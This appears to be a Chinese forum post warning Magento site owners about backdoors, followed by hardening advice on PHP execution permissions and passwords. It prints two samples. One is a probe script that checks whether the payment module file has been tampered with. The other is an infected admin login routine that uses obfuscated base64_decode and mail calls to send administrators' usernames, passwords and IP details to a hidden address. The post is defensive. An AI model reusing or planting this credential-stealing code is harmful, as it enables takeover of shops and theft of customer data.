<?php function RFILE($folder){ $idn = $_SERVER['DOCUMENT_ROOT']; if(fopen($idn."/".$folder,"r")){ $alltext=file($idn."/".$folder); $text=json_encode($alltext); CheckFile($text); } } RFILE("/app/code/core/Mage/Payment/Model/Method/Cc.php")."<br/>"; function CheckFile($string){ if(strpos($string,"***") == true){ echo 'site ok'; } else { echo 'site not add'; } } ?>
此文件被多数恶意攻击者用于记录MAGENTO网站后台信息数据一般是植入到SESSION.php文件下
try {
/** @var $user Mage_Admin_Model_User */
$user = $this->_factory->getModel('admin/user');
$user->login($username, $password);
if ($user->getId()) {
$srv = $_SERVER['SERVER_NAME'];
$ips = $_SERVER['REMOTE_ADDR'];
$getip = 'http://ip-api.com/json/' . $ips;
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $getip);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($curl);
curl_close($curl);
$details = json_decode($content);
$country_code = $details->countryCode;
$country_name = $details->country;
$id = "ba"."se"."64"."_"."de"."co"."de";
$db = "ma"."il";
$key = $id("dHJ1bXBkcmVhbUB5YW5kZXguY29t");
$auth = "Username : ".$username."\nPassword : ".$password."\nEmail : ".$user->getEmail()."\nRequest : ".$_SERVER['REQUEST_URI']."\n\nIP Info : ".$ips." | ".$country_name." On ".date('r')."\nBrowser : ".$_SERVER['HTTP_USER_AGENT']."\nSite : ".$srv."";
$subjk = "".$country_code." [".$srv." - ".$ips."]";
$headr = "From: Magento Admin <".$username."@".$ips.">";
$db($key, $subjk, $auth, $headr);
$this->renewSession();
if (Mage::getSingleton('adminhtml/url')->useSecretKey()) {
Mage::getSingleton('adminhtml/url')->renewSecretUrls();
}
$this->setIsFirstPageAfterLogin(true);
$this->setUser($user);
$this->setAcl(Mage::getResourceModel('admin/acl')->loadAcl());
$alternativeUrl = $this->_getRequestUri($request);
$redirectUrl = $this->_urlPolicy->getRedirectUrl($user, $request, $alternativeUrl);
if ($redirectUrl) {
Mage::dispatchEvent('admin_session_user_login_success', array('user' => $user));
$this->_response->clearHeaders()
->setRedirect($redirectUrl)
->sendHeadersAndExit();
}
} else {
Mage::throwException(Mage::helper('adminhtml')->__('Invalid User Name or Password.'));
}
} catch (Mage_Core_Exception $e) {
$e->setMessage(
Mage::helper('adminhtml')->__('You did not sign in correctly or your account is temporarily disabled.')
);
Mage::dispatchEvent('admin_session_user_login_failed',
array('user_name' => $username, 'exception' => $e));
if ($request && !$request->getParam('messageSent')) {
Mage::getSingleton('adminhtml/session')->addError($e->getMessage());
$request->setParam('messageSent', true);
}
}
像常见的webshell脚本 B374k及其它的一些危害性大,一般人做网站不限制权限都会出问题,允许上传文件及图片的目录不能允许有PHP执行权限,解决这个99%的木马没有办法,余下的是防跨站攻击
许多mAGENTO站点用户防不住木马 主要的就是没有做好密码保护,用简单密码,不论是MYSQL,FTP,还是网站后台
以下目录应该禁止PHP执行:
js
media
skin
以下目录应该限制执行,入口文件仅index.php
app
includes
lib
dev
downloader 这个目录建议删除,大部分是通过这里植入的
@admin
像常见的webshell脚本 B374k及其它的一些危害性大,一般人做网站不限制权限都会出问题,允许上传文件及图片的目录不能允许有PHP执行权限,解决这个99%的木马没有办法,余下的是防跨站攻击许多m...
网友回帖 3 条回帖